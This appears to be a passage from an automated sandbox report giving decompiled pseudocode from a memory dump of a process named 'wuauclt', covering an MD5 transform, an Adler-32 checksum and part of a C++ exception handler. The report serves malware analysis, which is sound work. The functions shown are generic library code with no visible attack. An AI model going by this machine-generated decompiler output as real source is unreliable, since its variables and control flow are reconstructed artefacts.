                                                • Opcode Fuzzy Hash: c3dbe67e562f5eebf6d9fb5824bd4f16f704dcc76a2f74d5967e2d2692c727d2
                                                • Instruction Fuzzy Hash: CAA01130A002028B83008F30BA0C20C3AACAB002C03088028E80AC0020EBB082C0AA82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 54%
                                                			E00253D70(intOrPtr* __ecx, intOrPtr __edx) {
                                                				intOrPtr _v8;
                                                				intOrPtr* _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				intOrPtr _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _t154;
                                                				void* _t394;
                                                				intOrPtr _t396;
                                                				signed int _t401;
                                                				signed int _t403;
                                                				signed int _t405;
                                                				signed int _t409;
                                                				signed int _t411;
                                                				signed int _t413;
                                                				signed int _t415;
                                                				signed int _t419;
                                                				signed int _t421;
                                                				signed int _t423;
                                                				signed int _t426;
                                                				intOrPtr* _t427;
                                                				signed int _t517;
                                                				signed int _t600;
                                                				signed int _t605;
                                                				signed int _t610;
                                                				signed int _t614;
                                                				signed int _t616;
                                                				signed int _t618;
                                                				signed int _t620;
                                                				intOrPtr _t627;
                                                				signed int _t630;
                                                				signed int _t632;
                                                				signed int _t634;
                                                				signed int _t636;
                                                				signed int _t638;
                                                				signed int _t643;
                                                				signed int _t645;
                                                				signed int _t647;
                                                				signed int _t650;
                                                				signed int _t652;
                                                				signed int _t654;
                                                				signed int _t656;
                                                				signed int _t661;
                                                				signed int _t663;
                                                				signed int _t665;
                                                				signed int _t667;
                                                				signed int _t669;
                                                				signed int _t672;
                                                				signed int _t674;
                                                				intOrPtr _t675;
                                                				intOrPtr _t676;
                                                				signed int _t681;
                                                				signed int _t683;
                                                				signed int _t685;
                                                				signed int _t688;
                                                				signed int _t692;
                                                				signed int _t694;
                                                				signed int _t696;
                                                				signed int _t698;
                                                				signed int _t701;
                                                				signed int _t703;
                                                				signed int _t705;
                                                				signed int _t707;
                                                				signed int _t709;
                                                				signed int _t711;
                                                				signed int _t713;
                                                				signed int _t716;
                                                				intOrPtr _t720;
                                                				signed int _t724;
                                                				signed int _t726;
                                                				signed int _t728;
                                                				signed int _t730;
                                                				signed int _t735;
                                                				signed int _t737;
                                                				signed int _t739;
                                                				signed int _t743;
                                                				signed int _t745;
                                                				signed int _t747;
                                                				signed int _t749;
                                                				signed int _t751;
                                                				signed int _t753;
                                                				signed int _t755;
                                                				signed int _t757;
                                                				signed int _t759;
                                                
                                                				_v12 = __ecx;
                                                				_t674 =  *(__ecx + 0xc);
                                                				_t627 =  *((intOrPtr*)(__edx));
                                                				_v76 = _t674;
                                                				_t675 = _v12;
                                                				_v60 = _t627;
                                                				_v8 = __edx;
                                                				_t720 =  *((intOrPtr*)(__edx + 4));
                                                				asm("rol edx, 0x7");
                                                				_v68 = _t720;
                                                				_t154 =  *(_t675 + 4);
                                                				_t630 =  *__ecx - 0x28955b88 + ( !( *(__ecx + 4)) & _t674 |  *(__ecx + 8) &  *(_t675 + 4)) + _t627 + _t154;
                                                				_t676 =  *((intOrPtr*)(__edx + 8));
                                                				_t396 =  *((intOrPtr*)(__edx + 0xc));
                                                				_v72 = _t676;
                                                				asm("rol esi, 0xc");
                                                				_t724 = _v76 + 0xe8c7b756 + ( !_t630 &  *(_t675 + 8) | _t154 & _t630) + _t720 + _t630;
                                                				_v64 = _t396;
                                                				asm("rol edi, 0x11");
                                                				_t681 =  *((intOrPtr*)(_v12 + 8)) + 0x242070db + ( !_t724 &  *(_v12 + 4) | _t724 & _t630) + _t676 + _t724;
                                                				_v44 =  *((intOrPtr*)(_v8 + 0x10));
                                                				asm("rol ebx, 0x16");
                                                				_t401 =  *(_v12 + 4) + 0xc1bdceee + ( !_t681 & _t630 | _t724 & _t681) + _t396 + _t681;
                                                				asm("rol edx, 0x7");
                                                				_t632 = _t630 + ( !_t401 & _t724 | _t681 & _t401) + 0xf57c0faf + _v44 + _t401;
                                                				_v24 =  *((intOrPtr*)(_v8 + 0x14));
                                                				_v36 =  *((intOrPtr*)(_v8 + 0x18));
                                                				asm("rol esi, 0xc");
                                                				_t726 = _t724 + ( !_t632 & _t681 | _t401 & _t632) + 0x4787c62a + _v24 + _t632;
                                                				_v16 =  *((intOrPtr*)(_v8 + 0x1c));
                                                				asm("rol edi, 0x11");
                                                				_t683 = _t681 + ( !_t726 & _t401 | _t726 & _t632) + 0xa8304613 + _v36 + _t726;
                                                				_v32 =  *((intOrPtr*)(_v8 + 0x20));
                                                				asm("rol ebx, 0x16");
                                                				_t403 = _t401 + ( !_t683 & _t632 | _t726 & _t683) + 0xfd469501 + _v16 + _t683;
                                                				asm("rol edx, 0x7");
                                                				_t634 = _t632 + ( !_t403 & _t726 | _t683 & _t403) + 0x698098d8 + _v32 + _t403;
                                                				_v52 =  *((intOrPtr*)(_v8 + 0x24));
                                                				asm("rol esi, 0xc");
                                                				_t728 = _t726 + ( !_t634 & _t683 | _t403 & _t634) + 0x8b44f7af + _v52 + _t634;
                                                				_v28 =  *((intOrPtr*)(_v8 + 0x28));
                                                				_v48 =  *((intOrPtr*)(_v8 + 0x2c));
                                                				asm("rol edi, 0x11");
                                                				_t685 = _t683 + ( !_t728 & _t403 | _t728 & _t634) + 0xffff5bb1 + _v28 + _t728;
                                                				_v80 = _t685;
                                                				_v56 =  *((intOrPtr*)(_v8 + 0x30));
                                                				asm("rol ebx, 0x16");
                                                				_t405 = _t403 + ( !_t685 & _t634 | _t728 & _t685) + 0x895cd7be + _v48 + _t685;
                                                				_v84 = _t405;
                                                				_v40 =  *((intOrPtr*)(_v8 + 0x34));
                                                				asm("rol edx, 0x7");
                                                				_t636 = _t634 + ( !_t405 & _t728 | _t685 & _t405) + 0x6b901122 + _v56 + _t405;
                                                				_v76 = _t636;
                                                				asm("rol edi, 0xc");
                                                				_t688 = _t728 - 0x2678e6d + ( !_t636 & _t685 | _t405 & _t636) + _v40 + _t636;
                                                				_v20 =  *((intOrPtr*)(_v8 + 0x38));
                                                				_t730 =  !_t688;
                                                				_v88 = _t688;
                                                				asm("rol ebx, 0x11");
                                                				_t409 = _v80 + 0xa679438e + (_t730 & _t405 | _t688 & _t636) + _v20 + _t688;
                                                				_t638 =  !_t409;
                                                				_v8 =  *((intOrPtr*)(_v8 + 0x3c));
                                                				_t517 = _v88;
                                                				asm("rol edi, 0x16");
                                                				_t692 = _v84 + 0x49b40821 + (_t638 & _v76 | _t688 & _t409) + _v8 + _t409;
                                                				asm("rol esi, 0x5");
                                                				_t735 = (_t730 & _t409 | _t517 & _t692) + _v68 + _v76 + 0xf61e2562 + _t692;
                                                				asm("rol edx, 0x9");
                                                				_t643 = (_t638 & _t692 | _t409 & _t735) + _v36 + _t517 + 0xc040b340 + _t735;
                                                				asm("rol ebx, 0xe");
                                                				_t411 = _t409 + ( !_t692 & _t735 | _t643 & _t692) + 0x265e5a51 + _v48 + _t643;
                                                				asm("rol edi, 0x14");
                                                				_t694 = _t692 + ( !_t735 & _t643 | _t411 & _t735) + 0xe9b6c7aa + _v60 + _t411;
                                                				asm("rol esi, 0x5");
                                                				_t737 = _t735 + ( !_t643 & _t411 | _t643 & _t694) + 0xd62f105d + _v24 + _t694;
                                                				asm("rol edx, 0x9");
                                                				_t645 = _t643 + ( !_t411 & _t694 | _t411 & _t737) + 0x2441453 + _v28 + _t737;
                                                				asm("rol ebx, 0xe");
                                                				_t413 = _t411 + ( !_t694 & _t737 | _t645 & _t694) + 0xd8a1e681 + _v8 + _t645;
                                                				asm("rol edi, 0x14");
                                                				_t696 = _t694 + ( !_t737 & _t645 | _t413 & _t737) + 0xe7d3fbc8 + _v44 + _t413;
                                                				asm("rol esi, 0x5");
                                                				_t739 = _t737 + ( !_t645 & _t413 | _t645 & _t696) + 0x21e1cde6 + _v52 + _t696;
                                                				asm("rol edx, 0x9");
                                                				_t647 = _t645 + ( !_t413 & _t696 | _t413 & _t739) + 0xc33707d6 + _v20 + _t739;
                                                				_v88 = _t647;
                                                				asm("rol ebx, 0xe");
                                                				_t415 = _t413 + ( !_t696 & _t739 | _t647 & _t696) + 0xf4d50d87 + _v64 + _t647;
                                                				asm("rol edi, 0x14");
                                                				_t698 = _t696 + ( !_t739 & _t647 | _t415 & _t739) + 0x455a14ed + _v32 + _t415;
                                                				_v84 = _t698;
                                                				asm("rol edx, 0x5");
                                                				_t650 = _t739 - 0x561c16fb + ( !_t647 & _t415 | _t647 & _t698) + _v40 + _t698;
                                                				asm("rol esi, 0x9");
                                                				_t743 = _v88 + 0xfcefa3f8 + ( !_t415 & _t698 | _t415 & _t650) + _v72 + _t650;
                                                				asm("rol edi, 0xe");
                                                				_t701 = _t415 + 0x676f02d9 + ( !_t698 & _t650 | _t743 & _t698) + _v16 + _t743;
                                                				asm("rol ebx, 0x14");
                                                				_t419 = _v84 + 0x8d2a4c8a + ( !_t650 & _t743 | _t701 & _t650) + _v56 + _t701;
                                                				asm("rol edx, 0x4");
                                                				_t652 = _t650 + (_t743 ^ _t701 ^ _t419) + 0xfffa3942 + _v24 + _t419;
                                                				asm("rol esi, 0xb");
                                                				_t745 = _t743 + (_t701 ^ _t419 ^ _t652) + 0x8771f681 + _v32 + _t652;
                                                				asm("rol edi, 0x10");
                                                				_t703 = _t701 + (_t745 ^ _t419 ^ _t652) + 0x6d9d6122 + _v48 + _t745;
                                                				_t600 = _t745 ^ _t703;
                                                				asm("rol ebx, 0x17");
                                                				_t421 = _t419 + (_t600 ^ _t652) + 0xfde5380c + _v20 + _t703;
                                                				asm("rol edx, 0x4");
                                                				_t654 = _t652 + (_t600 ^ _t421) + 0xa4beea44 + _v68 + _t421;
                                                				asm("rol esi, 0xb");
                                                				_t747 = _t745 + (_t703 ^ _t421 ^ _t654) + 0x4bdecfa9 + _v44 + _t654;
                                                				asm("rol edi, 0x10");
                                                				_t705 = _t703 + (_t747 ^ _t421 ^ _t654) + 0xf6bb4b60 + _v16 + _t747;
                                                				_t605 = _t747 ^ _t705;
                                                				asm("rol ebx, 0x17");
                                                				_t423 = _t421 + (_t605 ^ _t654) + 0xbebfbc70 + _v28 + _t705;
                                                				asm("rol edx, 0x4");
                                                				_t656 = _t654 + (_t605 ^ _t423) + 0x289b7ec6 + _v40 + _t423;
                                                				_v88 = _t656;
                                                				asm("rol esi, 0xb");
                                                				_t749 = _t747 + (_t705 ^ _t423 ^ _t656) + 0xeaa127fa + _v60 + _t656;
                                                				asm("rol edi, 0x10");
                                                				_t707 = _t705 + (_t749 ^ _t423 ^ _t656) + 0xd4ef3085 + _v64 + _t749;
                                                				_t610 = _t749 ^ _t707;
                                                				asm("rol edx, 0x17");
                                                				_t661 = (_t656 ^ _t610) + 0x4881d05 + _v36 + _t423 + _t707;
                                                				asm("rol ecx, 0x4");
                                                				_t614 = (_t610 ^ _t661) + _v52 + _v88 + 0xd9d4d039 + _t661;
                                                				asm("rol esi, 0xb");
                                                				_t751 = _t749 + (_t707 ^ _t661 ^ _t614) + 0xe6db99e5 + _v56 + _t614;
                                                				asm("rol edi, 0x10");
                                                				_t709 = _t707 + (_t751 ^ _t661 ^ _t614) + 0x1fa27cf8 + _v8 + _t751;
                                                				asm("rol edx, 0x17");
                                                				_t663 = _t661 + (_t751 ^ _t709 ^ _t614) + 0xc4ac5665 + _v72 + _t709;
                                                				asm("rol ecx, 0x6");
                                                				_t616 = _t614 + (( !_t751 | _t663) ^ _t709) + 0xf4292244 + _v60 + _t663;
                                                				asm("rol esi, 0xa");
                                                				_t753 = _t751 + (( !_t709 | _t616) ^ _t663) + 0x432aff97 + _v16 + _t616;
                                                				asm("rol edi, 0xf");
                                                				_t711 = _t709 + (( !_t663 | _t753) ^ _t616) + 0xab9423a7 + _v20 + _t753;
                                                				asm("rol edx, 0x15");
                                                				_t665 = _t663 + (( !_t616 | _t711) ^ _t753) + 0xfc93a039 + _v24 + _t711;
                                                				asm("rol ecx, 0x6");
                                                				_t618 = _t616 + (( !_t753 | _t665) ^ _t711) + 0x655b59c3 + _v56 + _t665;
                                                				asm("rol esi, 0xa");
                                                				_t755 = _t753 + (( !_t711 | _t618) ^ _t665) + 0x8f0ccc92 + _v64 + _t618;
                                                				asm("rol edi, 0xf");
                                                				_t713 = _t711 + (( !_t665 | _t755) ^ _t618) + 0xffeff47d + _v28 + _t755;
                                                				asm("rol edx, 0x15");
                                                				_t667 = _t665 + (( !_t618 | _t713) ^ _t755) + 0x85845dd1 + _v68 + _t713;
                                                				asm("rol ecx, 0x6");
                                                				_t620 = _t618 + (( !_t755 | _t667) ^ _t713) + 0x6fa87e4f + _v32 + _t667;
                                                				asm("rol esi, 0xa");
                                                				_t757 = _t755 + (( !_t713 | _t620) ^ _t667) + 0xfe2ce6e0 + _v8 + _t620;
                                                				asm("rol ebx, 0xf");
                                                				_t426 = _t713 - 0x5cfebcec + (( !_t667 | _t757) ^ _t620) + _v36 + _t757;
                                                				asm("rol edx, 0x15");
                                                				_t669 = _t667 + (( !_t620 | _t426) ^ _t757) + 0x4e0811a1 + _v40 + _t426;
                                                				_v88 = _t669;
                                                				asm("rol edi, 0x6");
                                                				_t716 = _t620 - 0x8ac817e + (( !_t757 | _t669) ^ _t426) + _v44 + _t669;
                                                				asm("rol esi, 0xa");
                                                				_t759 = _t757 + (( !_t426 | _t716) ^ _t669) + 0xbd3af235 + _v48 + _t716;
                                                				_t427 = _v12;
                                                				 *_t427 =  *_t427 + _t716;
                                                				asm("rol edx, 0xf");
                                                				_t672 = _t426 + 0x2ad7d2bb + (( !_t669 | _t759) ^ _t716) + _v72 + _t759;
                                                				 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t427 + 8)) + _t672;
                                                				_t394 = (( !_t716 | _t672) ^ _t759) + _v52;
                                                				asm("rol ecx, 0x15");
                                                				 *((intOrPtr*)(_t427 + 4)) =  *((intOrPtr*)(_t427 + 4)) + _v88 + 0xeb86d391 + _t394 + _t672;
                                                				 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t427 + 0xc)) + _t759;
                                                				return _t394;
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa8658c85613ced82dfeca77f2776ce9f118c4d8b26c411ab2ff9fc24b9d229e
                                                • Instruction ID: f6db76bcd502181040f99abea675bf97f3b77afa9c55846372d6e750a5549f03
                                                • Opcode Fuzzy Hash: fa8658c85613ced82dfeca77f2776ce9f118c4d8b26c411ab2ff9fc24b9d229e
                                                • Instruction Fuzzy Hash: EC3250B7F515144BDB4CCA9DCCA27ECB2E3AFD8314B0E813DA40AE3345EA79D9158A44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00252510() {
                                                				unsigned int _t28;
                                                				unsigned int _t35;
                                                				signed int _t38;
                                                				signed int _t40;
                                                				signed int _t41;
                                                				signed int _t42;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t49;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				unsigned int _t96;
                                                				signed int _t97;
                                                				unsigned int _t114;
                                                				signed int _t117;
                                                				void* _t119;
                                                
                                                				_t114 =  *(_t119 + 0xc);
                                                				_t96 =  *(_t119 + 0xc);
                                                				_t38 = _t96 & 0x0000ffff;
                                                				_t97 = _t96 >> 0x10;
                                                				if(_t114 != 0) {
                                                					_t35 =  *(_t119 + 0x18);
                                                					if(_t35 > 0) {
                                                						do {
                                                							_t28 = _t35;
                                                							if(_t35 >= 0x15b0) {
                                                								_t28 = 0x15b0;
                                                							}
                                                							_t35 = _t35 - _t28;
                                                							if(_t28 >= 0x10) {
                                                								_t117 = _t28 >> 4;
                                                								_t28 = _t28 + ( ~_t117 << 4);
                                                								do {
                                                									_t114 = _t114 + 0x10;
                                                									_t40 = _t38;
                                                									_t41 = _t40;
                                                									_t42 = _t41;
                                                									_t43 = _t42;
                                                									_t44 = _t43;
                                                									_t45 = _t44;
                                                									_t46 = _t45;
                                                									_t47 = _t46;
                                                									_t48 = _t47;
                                                									_t49 = _t48;
                                                									_t50 = _t49;
                                                									_t51 = _t50;
                                                									_t52 = _t51;
                                                									_t53 = _t52;
                                                									_t54 = _t53;
                                                									_t38 = _t54;
                                                									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
                                                									_t117 = _t117 - 1;
                                                								} while (_t117 != 0);
                                                							}
                                                							if(_t28 != 0) {
                                                								do {
                                                									_t38 = _t38;
                                                									_t114 = _t114 + 1;
                                                									_t97 = _t97 + _t38;
                                                									_t28 = _t28 - 1;
                                                								} while (_t28 != 0);
                                                							}
                                                							_t38 = _t38 % 0xfff1;
                                                							_t97 = _t97 % 0xfff1;
                                                						} while (_t35 > 0);
                                                					}
                                                					return _t97 << 0x00000010 | _t38;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                • Instruction ID: b0be640dbdc030b12a352ebfe7b21b92f474fa39e39ede490b27f06c3d6336c3
                                                • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                • Instruction Fuzzy Hash: 8B315E3374558203F71DCE2F9CA12BEEAD74FD622872DD47E98C587356ECB9842A4144
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0025882C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
                                                				intOrPtr _v0;
                                                				intOrPtr _v4;
                                                				char _v5;
                                                				char _v12;
                                                				char _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				char _v72;
                                                				intOrPtr* _v80;
                                                				signed int _v100;
                                                				signed int* _v144;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				char _t190;
                                                				signed int* _t198;
                                                				intOrPtr* _t199;
                                                				signed int _t202;
                                                				signed int _t206;
                                                				intOrPtr* _t210;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				signed int _t214;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				signed int _t221;
                                                				void* _t225;
                                                				signed int _t227;
                                                				void* _t231;
                                                				void* _t233;
                                                				char _t234;
                                                				signed int* _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t244;
                                                				void* _t246;
                                                				void* _t248;
                                                				void* _t251;
                                                				intOrPtr _t253;
                                                				intOrPtr _t254;
                                                				void* _t256;
                                                				char _t257;
                                                				signed int _t263;
                                                				char* _t267;
                                                				intOrPtr _t273;
                                                				signed int _t278;
                                                				signed int _t279;
                                                				signed int _t282;
                                                				char _t283;
                                                				intOrPtr _t285;
                                                				signed int _t287;
                                                				signed int* _t289;
                                                				intOrPtr* _t290;
                                                				signed int* _t292;
                                                				signed int _t294;
                                                				intOrPtr _t300;
                                                				intOrPtr* _t304;
                                                				signed int _t305;
                                                				void* _t306;
                                                				signed int* _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t317;
                                                				void* _t318;
                                                				void* _t319;
                                                
                                                				_t282 = __edx;
                                                				_t264 = __ecx;
                                                				_t253 = _a8;
                                                				_push(_t304);
                                                				_t289 = _a20;
                                                				_v44 = 0;
                                                				_v5 = 0;
                                                				if(_t289[1] > 0x80) {
                                                					_t190 =  *((intOrPtr*)(_t253 + 8));
                                                				} else {
                                                					_t190 =  *((char*)(_t253 + 8));
                                                				}
                                                				_v12 = _t190;
                                                				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
                                                					L62:
                                                					E0025D148(_t264, _t282, _t289);
                                                					goto L63;
                                                				} else {
                                                					_t304 = _a4;
                                                					if( *_t304 != 0xe06d7363) {
                                                						_t264 = _a12;
                                                						goto L57;
                                                					} else {
                                                						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                							L23:
                                                							_t264 = _a12;
                                                							_v16 = _t264;
                                                							goto L25;
                                                						} else {
                                                							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
                                                							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
                                                								goto L23;
                                                							} else {
                                                								_t225 = E00259852(_t253, _t264, _t282, _t289, _t304, _t328);
                                                								_t329 =  *((intOrPtr*)(_t225 + 0x10));
                                                								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                									L61:
                                                									return _t225;
                                                								} else {
                                                									_t304 =  *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
                                                									_t246 = E00259852(_t253, _t264, _t282, _t289, _t304, _t329);
                                                									_v44 = 1;
                                                									_v16 =  *((intOrPtr*)(_t246 + 0x14));
                                                									if(_t304 == 0) {
                                                										goto L62;
                                                									} else {
                                                										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                											L19:
                                                											_t248 = E00259852(_t253, _t264, _t282, _t289, _t304, _t336);
                                                											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
                                                											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
                                                												L24:
                                                												_t264 = _v16;
                                                												_t190 = _v12;
                                                												L25:
                                                												__eflags =  *_t304 - 0xe06d7363;
                                                												if( *_t304 != 0xe06d7363) {
                                                													L57:
                                                													__eflags = _t289[3];
                                                													if(__eflags <= 0) {
                                                														goto L60;
                                                													} else {
                                                														__eflags = _a24;
                                                														if(__eflags != 0) {
                                                															goto L62;
                                                														} else {
                                                															_push(_a32);
                                                															_push(_a28);
                                                															_push(_t190);
                                                															_push(_t289);
                                                															_push(_a16);
                                                															_push(_t264);
                                                															_push(_t253);
                                                															_push(_t304);
                                                															L66();
                                                															_t316 = _t316 + 0x20;
                                                															goto L60;
                                                														}
                                                													}
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
                                                													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
                                                														goto L57;
                                                													} else {
                                                														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
                                                														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
                                                															L30:
                                                															__eflags = _t289[3];
                                                															if(_t289[3] > 0) {
                                                																_t264 =  &_v28;
                                                																_t233 = E00259AB9( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
                                                																_t282 = _v28;
                                                																_t316 = _t316 + 0x14;
                                                																__eflags = _t282 - _v48;
                                                																if(_t282 < _v48) {
                                                																	_t47 = _t233 + 0x10; // 0x10
                                                																	_t278 = _t47;
                                                																	_t234 = _v12;
                                                																	_v36 = _t278;
                                                																	do {
                                                																		_t50 = _t278 - 0x10; // 0x0
                                                																		_v60 = _t50;
                                                																		_t289 = _a20;
                                                																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
                                                																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
                                                																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
                                                																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
                                                																				_v24 =  *_t278;
                                                																				_t263 =  *(_t278 - 4);
                                                																				__eflags = _t263;
                                                																				_v32 = _t263;
                                                																				_t253 = _a8;
                                                																				if(_t263 > 0) {
                                                																					_t279 = _v24;
                                                																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
                                                																					_t287 =  *_t236;
                                                																					_t237 =  &(_t236[1]);
                                                																					__eflags = _t237;
                                                																					_v52 = _t237;
                                                																					_t238 = _v32;
                                                																					_v56 = _t287;
                                                																					while(1) {
                                                																						_v20 = _v52;
                                                																						_t289 = _a20;
                                                																						_v40 = _t287;
                                                																						__eflags = _t287;
                                                																						if(_t287 <= 0) {
                                                																							goto L41;
                                                																						} else {
                                                																							goto L38;
                                                																						}
                                                																						while(1) {
                                                																							L38:
                                                																							_t240 = E00259179(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
                                                																							_t316 = _t316 + 0xc;
                                                																							__eflags = _t240;
                                                																							if(_t240 != 0) {
                                                																								break;
                                                																							}
                                                																							_v20 = _v20 + 4;
                                                																							_t244 = _v40 - 1;
                                                																							_t279 = _v24;
                                                																							_v40 = _t244;
                                                																							__eflags = _t244;
                                                																							if(_t244 > 0) {
                                                																								continue;
                                                																							} else {
                                                																								_t238 = _v32;
                                                																								goto L41;
                                                																							}
                                                																							L44:
                                                																							_t282 = _v28;
                                                																							_t278 = _v36;
                                                																							_t234 = _v12;
                                                																							goto L45;
                                                																						}
                                                																						_push(_v44);
                                                																						_v5 = 1;
                                                																						E00258767(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
                                                																						_t316 = _t316 + 0x2c;
                                                																						goto L44;
                                                																						L41:
                                                																						_t238 = _t238 - 1;
                                                																						_t279 = _t279 + 0x10;
                                                																						_v32 = _t238;
                                                																						_v24 = _t279;
                                                																						__eflags = _t238;
                                                																						if(_t238 > 0) {
                                                																							_t287 = _v56;
                                                																							_v20 = _v52;
                                                																							_t289 = _a20;
                                                																							_v40 = _t287;
                                                																							__eflags = _t287;
                                                																							if(_t287 <= 0) {
                                                																								goto L41;
                                                																							} else {
                                                																								goto L38;
                                                																							}
                                                																						}
                                                																						goto L44;
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																		L45:
                                                																		_t282 = _t282 + 1;
                                                																		_t278 = _t278 + 0x14;
                                                																		_v28 = _t282;
                                                																		_v36 = _t278;
                                                																		__eflags = _t282 - _v48;
                                                																	} while (_t282 < _v48);
                                                																}
                                                															}
                                                															__eflags = _a24;
                                                															if(_a24 != 0) {
                                                																_push(1);
                                                																E002584A4();
                                                																_t264 = _t304;
                                                															}
                                                															__eflags = _v5;
                                                															if(__eflags != 0) {
                                                																L60:
                                                																_t225 = E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																__eflags =  *(_t225 + 0x1c);
                                                																if( *(_t225 + 0x1c) != 0) {
                                                																	goto L62;
                                                																} else {
                                                																	goto L61;
                                                																}
                                                															} else {
                                                																_t227 =  *_t289 & 0x1fffffff;
                                                																__eflags = _t227 - 0x19930521;
                                                																if(__eflags < 0) {
                                                																	goto L60;
                                                																} else {
                                                																	__eflags = _t289[7];
                                                																	if(_t289[7] != 0) {
                                                																		L52:
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if((_t289[8] & 0x00000004) != 0) {
                                                																			goto L62;
                                                																		} else {
                                                																			_push(_t289[7]);
                                                																			L86();
                                                																			_t264 = _t304;
                                                																			__eflags = _t227;
                                                																			if(__eflags != 0) {
                                                																				goto L60;
                                                																			} else {
                                                																				E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				 *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
